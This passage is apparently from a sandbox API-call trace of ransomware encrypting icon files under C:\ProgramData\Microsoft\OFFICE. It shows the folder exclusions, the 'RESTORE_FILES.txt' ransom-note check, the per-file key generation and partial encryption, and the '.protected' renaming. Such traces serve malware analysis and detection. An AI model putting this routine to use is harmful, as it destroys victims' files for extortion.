1 [0066.950] CloseHandle (hObject=0xb4) returned 1 [0066.951] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico.protected") returned 62 [0066.951] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico" (normalized: "c:\\programdata\\microsoft\\office\\assetlibrary.ico"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico.protected" (normalized: "c:\\programdata\\microsoft\\office\\assetlibrary.ico.protected")) returned 1 [0066.951] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.951] lstrcmpiW (lpString1="DocumentRepository.ico", lpString2="Windows") returned -1 [0066.951] lstrcmpiW (lpString1="DocumentRepository.ico", lpString2="Program Files") returned -1 [0066.951] lstrcmpiW (lpString1="DocumentRepository.ico", lpString2="Program Files (x86)") returned -1 [0066.951] lstrcmpiW (lpString1="DocumentRepository.ico", lpString2="$Recycle.bin") returned 1 [0066.951] lstrcmpiW (lpString1="DocumentRepository.ico", lpString2="System Volume Information") returned -1 [0066.951] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico") returned 58 [0066.952] StrStrIW (lpFirst="DocumentRepository.ico", lpSrch=".protected") returned 0x0 [0066.952] lstrcmpW (lpString1="DocumentRepository.ico", lpString2="RESTORE_FILES.txt") returned -1 [0066.952] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0066.952] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f154*=0x30) returned 1 [0066.952] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico" (normalized: 
"c:\\programdata\\microsoft\\office\\documentrepository.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0066.963] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico") returned 58 [0066.963] StrStrW (lpFirst="DocumentRepository.ico", lpSrch=".txt") returned 0x0 [0066.963] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico") returned 58 [0066.963] StrStrW (lpFirst="DocumentRepository.ico", lpSrch=".rar") returned 0x0 [0066.963] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico") returned 58 [0066.963] StrStrW (lpFirst="DocumentRepository.ico", lpSrch=".zip") returned 0x0 [0066.963] ReadFile (in: hFile=0xb4, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0066.965] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.965] WriteFile (in: hFile=0xb4, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0066.965] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.965] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0066.967] WriteFile (in: hFile=0xb4, lpBuffer=0x447c80*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447c80*, 
lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0066.967] CloseHandle (hObject=0xb4) returned 1 [0066.967] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico.protected") returned 68 [0066.967] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico" (normalized: "c:\\programdata\\microsoft\\office\\documentrepository.ico"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico.protected" (normalized: "c:\\programdata\\microsoft\\office\\documentrepository.ico.protected")) returned 1 [0066.968] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.968] lstrcmpiW (lpString1="MySharePoints.ico", lpString2="Windows") returned -1 [0066.968] lstrcmpiW (lpString1="MySharePoints.ico", lpString2="Program Files") returned -1 [0066.968] lstrcmpiW (lpString1="MySharePoints.ico", lpString2="Program Files (x86)") returned -1 [0066.968] lstrcmpiW (lpString1="MySharePoints.ico", lpString2="$Recycle.bin") returned 1 [0066.968] lstrcmpiW (lpString1="MySharePoints.ico", lpString2="System Volume Information") returned -1 [0066.968] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico") returned 53 [0066.968] StrStrIW (lpFirst="MySharePoints.ico", lpSrch=".protected") returned 0x0 [0066.968] lstrcmpW (lpString1="MySharePoints.ico", lpString2="RESTORE_FILES.txt") returned -1 [0066.968] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0066.968] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f154*=0x30) returned 1 [0066.968] CreateFileW 
(lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico" (normalized: "c:\\programdata\\microsoft\\office\\mysharepoints.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0066.969] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico") returned 53 [0066.969] StrStrW (lpFirst="MySharePoints.ico", lpSrch=".txt") returned 0x0 [0066.969] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico") returned 53 [0066.969] StrStrW (lpFirst="MySharePoints.ico", lpSrch=".rar") returned 0x0 [0066.969] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico") returned 53 [0066.969] StrStrW (lpFirst="MySharePoints.ico", lpSrch=".zip") returned 0x0 [0066.970] ReadFile (in: hFile=0xb4, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0066.971] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.971] WriteFile (in: hFile=0xb4, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0066.972] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.972] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0066.980] WriteFile (in: hFile=0xb4, lpBuffer=0x447c80*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, 
lpOverlapped=0x0 | out: lpBuffer=0x447c80*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0066.980] CloseHandle (hObject=0xb4) returned 1 [0066.981] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico.protected") returned 63 [0066.981] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico" (normalized: "c:\\programdata\\microsoft\\office\\mysharepoints.ico"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico.protected" (normalized: "c:\\programdata\\microsoft\\office\\mysharepoints.ico.protected")) returned 1 [0066.981] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.981] lstrcmpiW (lpString1="MySite.ico", lpString2="Windows") returned -1 [0066.981] lstrcmpiW (lpString1="MySite.ico", lpString2="Program Files") returned -1 [0066.981] lstrcmpiW (lpString1="MySite.ico", lpString2="Program Files (x86)") returned -1 [0066.981] lstrcmpiW (lpString1="MySite.ico", lpString2="$Recycle.bin") returned 1 [0066.981] lstrcmpiW (lpString1="MySite.ico", lpString2="System Volume Information") returned -1 [0066.981] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico") returned 46 [0066.981] StrStrIW (lpFirst="MySite.ico", lpSrch=".protected") returned 0x0 [0066.982] lstrcmpW (lpString1="MySite.ico", lpString2="RESTORE_FILES.txt") returned -1 [0066.982] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0066.982] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f154*=0x30) returned 1 [0066.982] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico" (normalized: 
"c:\\programdata\\microsoft\\office\\mysite.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0066.983] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico") returned 46 [0066.984] StrStrW (lpFirst="MySite.ico", lpSrch=".txt") returned 0x0 [0066.984] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico") returned 46 [0066.984] StrStrW (lpFirst="MySite.ico", lpSrch=".rar") returned 0x0 [0066.984] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico") returned 46 [0066.984] StrStrW (lpFirst="MySite.ico", lpSrch=".zip") returned 0x0 [0066.984] ReadFile (in: hFile=0xb4, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0067.134] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.145] WriteFile (in: hFile=0xb4, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0067.145] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.145] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0067.146] WriteFile (in: hFile=0xb4, lpBuffer=0x447c80*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447c80*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0067.146] CloseHandle (hObject=0xb4) 
returned 1 [0067.146] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico.protected") returned 56 [0067.146] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico" (normalized: "c:\\programdata\\microsoft\\office\\mysite.ico"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico.protected" (normalized: "c:\\programdata\\microsoft\\office\\mysite.ico.protected")) returned 1 [0067.147] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0067.147] lstrcmpiW (lpString1="SharePointPortalSite.ico", lpString2="Windows") returned -1 [0067.147] lstrcmpiW (lpString1="SharePointPortalSite.ico", lpString2="Program Files") returned 1 [0067.147] lstrcmpiW (lpString1="SharePointPortalSite.ico", lpString2="Program Files (x86)") returned 1 [0067.147] lstrcmpiW (lpString1="SharePointPortalSite.ico", lpString2="$Recycle.bin") returned 1 [0067.147] lstrcmpiW (lpString1="SharePointPortalSite.ico", lpString2="System Volume Information") returned -1 [0067.147] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico") returned 60 [0067.147] StrStrIW (lpFirst="SharePointPortalSite.ico", lpSrch=".protected") returned 0x0 [0067.147] lstrcmpW (lpString1="SharePointPortalSite.ico", lpString2="RESTORE_FILES.txt") returned 1 [0067.147] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0067.148] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f154*=0x30) returned 1 [0067.148] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico" (normalized: "c:\\programdata\\microsoft\\office\\sharepointportalsite.ico"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0067.229] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico") returned 60 [0067.229] StrStrW (lpFirst="SharePointPortalSite.ico", lpSrch=".txt") returned 0x0 [0067.229] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico") returned 60 [0067.229] StrStrW (lpFirst="SharePointPortalSite.ico", lpSrch=".rar") returned 0x0 [0067.229] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico") returned 60 [0067.229] StrStrW (lpFirst="SharePointPortalSite.ico", lpSrch=".zip") returned 0x0 [0067.229] ReadFile (in: hFile=0xb4, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0067.261] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.261] WriteFile (in: hFile=0xb4, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0067.301] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.301] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0067.301] WriteFile (in: hFile=0xb4, lpBuffer=0x447c80*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447c80*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 
[0067.301] CloseHandle (hObject=0xb4) returned 1 [0067.302] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico.protected") returned 70 [0067.302] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico" (normalized: "c:\\programdata\\microsoft\\office\\sharepointportalsite.ico"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico.protected" (normalized: "c:\\programdata\\microsoft\\office\\sharepointportalsite.ico.protected")) returned 1 [0067.302] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0067.302] lstrcmpiW (lpString1="SharePointTeamSite.ico", lpString2="Windows") returned -1 [0067.302] lstrcmpiW (lpString1="SharePointTeamSite.ico", lpString2="Program Files") returned 1 [0067.302] lstrcmpiW (lpString1="SharePointTeamSite.ico", lpString2="Program Files (x86)") returned 1 [0067.303] lstrcmpiW (lpString1="SharePointTeamSite.ico", lpString2="$Recycle.bin") returned 1 [0067.303] lstrcmpiW (lpString1="SharePointTeamSite.ico", lpString2="System Volume Information") returned -1 [0067.303] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico") returned 58 [0067.303] StrStrIW (lpFirst="SharePointTeamSite.ico", lpSrch=".protected") returned 0x0 [0067.303] lstrcmpW (lpString1="SharePointTeamSite.ico", lpString2="RESTORE_FILES.txt") returned 1 [0067.303] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0067.303] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f154*=0x30) returned 1 [0067.303] CreateFileW 
(lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico" (normalized: "c:\\programdata\\microsoft\\office\\sharepointteamsite.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0067.304] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico") returned 58 [0067.304] StrStrW (lpFirst="SharePointTeamSite.ico", lpSrch=".txt") returned 0x0 [0067.304] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico") returned 58 [0067.304] StrStrW (lpFirst="SharePointTeamSite.ico", lpSrch=".rar") returned 0x0 [0067.304] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico") returned 58 [0067.304] StrStrW (lpFirst="SharePointTeamSite.ico", lpSrch=".zip") returned 0x0 [0067.304] ReadFile (in: hFile=0xb4, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0067.325] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.326] WriteFile (in: hFile=0xb4, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0067.326] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.326] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0067.326] WriteFile (in: hFile=0xb4, lpBuffer=0x447c80*, nNumberOfBytesToWrite=0x30, 
lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447c80*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0067.326] CloseHandle (hObject=0xb4) returned 1 [0067.327] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico.protected") returned 68 [0067.327] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico" (normalized: "c:\\programdata\\microsoft\\office\\sharepointteamsite.ico"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico.protected" (normalized: "c:\\programdata\\microsoft\\office\\sharepointteamsite.ico.protected")) returned 1 [0067.328] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0067.328] lstrcmpiW (lpString1="UICaptions", lpString2="Windows") returned -1 [0067.328] lstrcmpiW (lpString1="UICaptions", lpString2="Program Files") returned 1 [0067.328] lstrcmpiW (lpString1="UICaptions", lpString2="Program Files (x86)") returned 1 [0067.328] lstrcmpiW (lpString1="UICaptions", lpString2="$Recycle.bin") returned 1 [0067.328] lstrcmpiW (lpString1="UICaptions", lpString2="System Volume Information") returned 1 [0067.328] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions") returned 46 [0067.328] lstrcmpW (lpString1="UICaptions", lpString2=".") returned 1 [0067.328] lstrcmpW (lpString1="UICaptions", lpString2="..") returned 1 [0067.328] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\*") returned 48 [0067.328] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0067.329] lstrcmpiW (lpString1=".", 
lpString2="Windows") returned -1 [0067.329] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0067.329] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0067.329] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0067.329] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0067.329] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\.") returned 48 [0067.329] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0067.329] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0067.329] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0067.329] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0067.329] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0067.330] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0067.330] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0067.330] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\..") returned 49 [0067.330] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0067.330] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0067.330] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0067.330] lstrcmpiW (lpString1="1036", lpString2="Windows") returned -1 [0067.330] lstrcmpiW (lpString1="1036", lpString2="Program Files") returned -1 [0067.330] lstrcmpiW (lpString1="1036", lpString2="Program Files (x86)") returned -1 [0067.330] lstrcmpiW (lpString1="1036", lpString2="$Recycle.bin") returned 1 [0067.330] lstrcmpiW (lpString1="1036", lpString2="System Volume Information") returned -1 [0067.330] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036") returned 51 [0067.330] lstrcmpW (lpString1="1036", lpString2=".") returned 1 [0067.330] lstrcmpW (lpString1="1036", lpString2="..") returned 1 [0067.331] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\*") returned 53 [0067.331] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0067.378] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0067.378] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0067.378] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0067.378] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0067.378] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0067.378] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\.") returned 53 [0067.378] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0067.378] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0067.406] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0067.406] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0067.406] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0067.406] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0067.406] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0067.406] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\..") returned 54 [0067.406] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0067.406] lstrcmpW (lpString1="..", lpString2="..") returned 0 
